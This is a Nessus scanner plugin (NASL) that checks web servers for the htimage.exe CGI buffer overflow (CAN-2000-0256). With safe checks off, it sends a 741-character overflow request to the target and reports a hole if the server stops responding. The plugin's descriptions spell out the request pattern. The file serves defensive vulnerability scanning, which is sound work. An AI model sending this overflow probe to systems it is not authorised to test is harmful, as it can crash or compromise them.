home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / fp_htimage.nasl

< prev

next >

Wrap

Text File  |  2005-01-14  |  3KB  |  142 lines

---

1. #
2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
3. #
4. #
5. # See the Nessus Scripts License for details
6. #
7. # Added some extra checks. Axel Nennker axel@nennker.de
8.  
9. if(description)
10. {
11.  script_id(10376);
12.  script_bugtraq_id(1117);
13.  script_version ("$Revision: 1.24 $");
14.  script_cve_id("CAN-2000-0256");
15.  
16.  name["english"] = "htimage.exe overflow";
17.  name["francais"] = "dΘpassement de buffer dans htimage.exe";
18.  
19.  script_name(english:name["english"],
20.          francais:name["francais"]);
21.  
22.  # Description
23.  desc["english"] = "
24. There is a buffer overflow in the remote
25. htimage.exe cgi when it is given the request :
26.  
27. /cgi-bin/htimage.exe/AAAA[....]AAA?0,0
28.  
29. An attacker may use it to execute arbitrary code
30. on this host.
31.  
32. Solution : delete it
33. Risk factor : High";
34.  
35.  desc["francais"] = "
36. Il y a un dΘpassement de buffer dans le 
37. CGI distant htimage.exe quand on lui fait
38. la requΦte :
39.  
40. /cgi-bin/htimage.exe/AAAAA[....]AAAA?0,0
41.  
42. Un pirate peut utiliser ce problΦme
43. pour executer du code arbitraire sur
44. ce systΦme.
45.  
46. Solution : supprimez ce CGI
47. Facteur de risque : ElevΘ";
48.  
49.  
50.  script_description(english:desc["english"],
51.              francais:desc["francais"]);
52.  
53.  # Summary
54.  summary["english"] = "Is htimage.exe vulnerable to a buffer overflow ?";
55.  summary["francais"] = "htimage.exe est-il vulnerΘble α un buffer overflow ?";
56.  script_summary(english:summary["english"],
57.          francais:summary["francais"]);
58.  
59.  # Category
60.  script_category(ACT_MIXED_ATTACK); # mixed
61.  
62.  # Dependencie(s)
63.  script_dependencie("find_service.nes", "no404.nasl");
64.  
65.  # Family
66.  family["english"] = "CGI abuses";
67.  family["francais"] = "Abus de CGI";
68.  script_family(english:family["english"],
69.             francais:family["francais"]);
70.  
71.  # Copyright
72.  script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
73.            francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
74.  
75.  script_require_ports("Services/www", 80);
76.  exit(0);
77. }
78.  
79. # The attack starts here
80. include("http_func.inc");
81. include("http_keepalive.inc");
82.  
83.  
84.  
85. port = get_http_port(default:80);
86.  
87. if(!get_port_state(port))exit(0);
88.  
89. if(safe_checks())
90. {
91.  foreach dir (cgi_dirs())
92.  {
93.  if(is_cgi_installed_ka(item:string(dir, "/htimage.exe"), port:port))
94.  {
95.   report = "
96. There may be a  buffer overflow in the remote
97. htimage.exe cgi when it is given the request :
98.   
99. /cgi-bin/htimage.exe/AAAA[....]AAA?0,0
100.   
101. An attacker may use it to execute arbitrary code
102. on this host.
103.   
104. *** Nessus reports this vulnerability using only
105. *** information that was gathered. Use caution
106. *** when testing without safe checks enabled.
107.   
108. Solution : delete it
109. Risk factor : High";
110.  
111.   security_hole(port:port, data:report);
112.   exit(0);
113.   }
114.  }
115.  exit(0);
116. }
117.  
118.  
119. if(http_is_dead(port:port))exit(0);
120.  
121. foreach dir (cgi_dirs())
122. {
123.  if(is_cgi_installed_ka(item:string(dir, "/htimage.exe"), port:port))
124.  {
125.   req = string(dir, "/htimage.exe/", crap(741), "?0,0");
126.   soc = http_open_socket(port);
127.   if(soc)
128.   {
129.   req = http_get(item:req, port:port);
130.   send(socket:soc, data:req);
131.   r = http_recv(socket:soc);
132.   if(!r)
133.    {
134.     security_hole(port);
135.    }
136.   }
137.  exit(0);
138.  }
139. }
140.  
141.  
142.